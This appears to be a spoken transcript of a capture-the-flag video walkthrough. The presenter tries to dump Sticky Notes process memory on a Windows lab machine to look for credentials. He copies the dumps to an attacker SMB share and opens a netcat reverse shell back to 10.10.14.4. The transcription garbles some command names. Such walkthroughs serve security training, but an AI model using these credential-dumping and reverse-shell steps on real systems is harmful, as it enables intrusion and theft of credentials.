Was that? Did it work? Did not work. Huh. dir. So getting rid of that dot slash executed it, but we don't have permission to dump this process. Let's see. Let's just try each one of these, but it may be something we just can't do without administrator. So maybe this was a silly rabbit hole I brought us down. dir. Ooh, we got something. That is juicy. If we type test.dump, format hex, select maybe get content, test.dump. Huh. Maybe we should copy this file back to our box. But before we do, let's grab that other one. 5788. Let's see, we also wanted 6124. 6124, test2.dump. dir. So we got two dumps. Can't type either of them, but we can probably copy it to a box. Let's do smb server sudo maybe share pwd. Does this do it right? I should make dir smb and do it from in there. I always get it reversed if it's Impacket's running. Where is Impacket? Kill that so the port's free. I always get confused between directory name and path. I think directory name comes first. So we should be able to copy stir.dump to 10.10.14.4 share. Okay, dump successful. ls. What? Share, let's do test.dmp 10.10.14.4 share test. Authenticated successfully, but did not drop the file. Huh. Netuse 10.10.14. Let's do z:10.10.14.4 share. Z:. Let's see. Wonder what a good way to copy this is going to be. I'm really surprised I can't just type format hex this. Oh, no. I was thinking we could just put it on a web server and download it. It can't be that easy, can it? We probably don't have write access there. dir / xampp htdocs. Is that it? inetpub. Let's see. cd / dir xampp dir. Nothing in this directory. I guess I don't have permission. inet pub. Can't do a dir there. cdk dot Svensson. Was it in desktop? Where'd I put it? Where was I? I was in documents. I wonder if there was a command that just periodically wiped documents. cd backslash cd windows cd temp. Let's run this run DLL command again. Come on. 6124. dir type test2.dmp. Huh. Let's just try using PS Drive. So let's do new PS Drive dash name. We'll call it ipsec dash root. This is going to be 10.10.14.4/share. PS provider file system. Authenticated successfully, I believe. See if we get this back. I don't know if that message is from, okay, it disconnected now. We're going to get our command back. Come on. Looks like we did. cd ipsec. Hey, I think we can write now. Echo test2 please sub. Let's go into SMB and we got a file. So now we can copy c:\windows temp test.dump here. Is that what we named it? ls smb. I wonder if this run DLL command is like not giving us access to the file. Oh, we called it test2.dump here. cp windows test2.dump. That's still too fast. watch-n1 ls. So that's going to permanently do a ls command up above. So now we can do this and just send it directly to ipsec test2.dump. Still not working. This is bizarre. Let's see if I have netcat on this box. Locate nc64.exe. I do have a copy of netcat. So let's cp this to smb nclvnp 9002 /nc64.exe. I think a -e cmd 10.10.14.4 9004. I think I did 9004. Don't know why I did that. 9002. Probably 10.10.14.2. Do I get a shell? Okay. Now we have this shell. cd temp type test2.dump. Access denied. So it's creating this file, and we don't have ownership over it. It's weird. I wonder if we can take ownership. cd users k.svensson cd. Let's go into videos. Maybe videos doesn't get cleared. And let's run this dump command again. Run DLL32. So the issue we were having before is apparently this PowerShell reverse shell is not displaying standard error. So when we were trying to do things, it just wasn't telling us there was an error. I'm going to call this 6124.dmp. So we do dir Probably need to specify full or something. There we go. So if we type this, access denied, we can probably take own. So take own /f test2.dump, or we just renamed it. Take own /f 6124.dump, access denied. So I'm guessing only root or administrator can read this dump file when we do it this way. Not exactly sure. Let's try putting process dump on this box. So process dump sys internals proc dump download. We can save it. And then go in SMB, CP, downloads, procdump.zip, unzip it, and we got it there. Net use z colon 1010 14.4 /share z colon task list. So now we should be able to get the sticky notes process ID. Access denied. Awesome. dir proc dump 64.exe dash accept yola. And where is PID? C dash U. Is there a PID? Let's see. I'm going to just do proc dump and PID. Was it 6124? Proc dump 64.exe accept yola 6124. Dump one initiated. So this looks better. I'm going to try this run DLL command again and output it to z colon. Maybe it just didn't like my PowerShell directory, but it's definitely dumping. We see 32. So we're actually getting it this way. Strings. Not much information has been gathered yet, but slowly but surely it should dump information. So I'm just going to pause the video and we will resume, hopefully when it's done. The dump finished, but it took 270 seconds. But we have now a sticky notes dump that we can take a look at with the strings command and maybe xxd it. And we don't really have any good information. There's definitely no credentials in this one. So let's go back to this and search for what? Get process. Do we have it here still? Here we go. Sticky notes. So we were looking at, what process did we dump? 6124, please. Where is it? Yeah, 6124. So we may want to dump, instead of 6124, 5788. So let's go here. /proc dump 64.exe accept yola 5788. And again, this probably will take a while. I don't know why it's so slow. Probably because it's writing over to the network. This one is 185519. If we xxd this right away, do we start seeing data? No, but who knows? We'll probably get data eventually. So again, gonna pause the video. It'll probably take 5 minutes, just like the last one. And we'll see if this one works. If not, we will try the next PID, which is 5732. This one gave us a error message right away last time. So we'll try that. I don't know why I'm going down this rabbit hole when this video has to be encoded and published in probably 15 hours now, but oh well, I like to live dangerously sometimes. So the second update has done and we don't really have anything. I guess we can try the last one, proc dump 64.exe except yola 5732. I wonder if there's an all flag in proc dump that I'm not doing. Let's see. -A, debug CPU threshold, write a dump, -F, filter, exclude, write dump as hung window, install, kill, debug. Let's see. Maybe a flag I'm just not doing. Capture 32 or 32 and 64. Let's try this. 5732. Let's just see if it accepts. I'm expecting it to display an error pretty quickly. No process matching. 5732. Let's see. PowerShell get process. Sticky. 5732 does exist, but it did not dump. 5732. Okay, so maybe there's just something I'm not doing, or maybe you can't do it this way. I thought it'd be fun to play with it. Let's try run DLL32 again. It is this 6124-full. Paste. Let's see. Let's do z:\\. Let's try this. Did that right? z:\. I don't see test.dump. So what's probably happening is when we invoke it this way, it just doesn't have access to network shares. And that may just be how we're doing the net use command. It may be this just doesn't let remote shares, but something definitely funky is happening here. But I think that's where I'm going to wrap up the video. If I come across a better way to dump it, I may add this, but yeah, hope you guys enjoyed it. Take care, and I'll see you all next week. So I'm going to try one last thing. So we're going to try the proc dump command again. That's not the right window. Proc dump. And we're going to specify MA as the flag. So 6124 is what we want. So /proc dump 64.exe-ma. Let's do except yola-ma 6124. And see if this works. Oh god, it looks like MA did the trick. This one's going to be 208 megs, which is a huge difference than 32K or whatever that was. If you look at SMB, it is, 32K. Or these are a bit bigger at 152, but yeah, this is going to be huge. It'll take quite a while to dump, so I'm just going to let my box idle. It looks like the dump finally finished, but I'm not happy with the 1 megabyte written. So chances are this failed yet again. Not sure exactly why, but hopefully if you read the comments, someone will point it out, or maybe it's just it doesn't like my network mount. But if we go to CDSMB and cat this, it is just as bare as before. So, well, unfortunately, that'll be the end of the video. Hope you guys enjoyed it. Take care, and I'll see you all next week.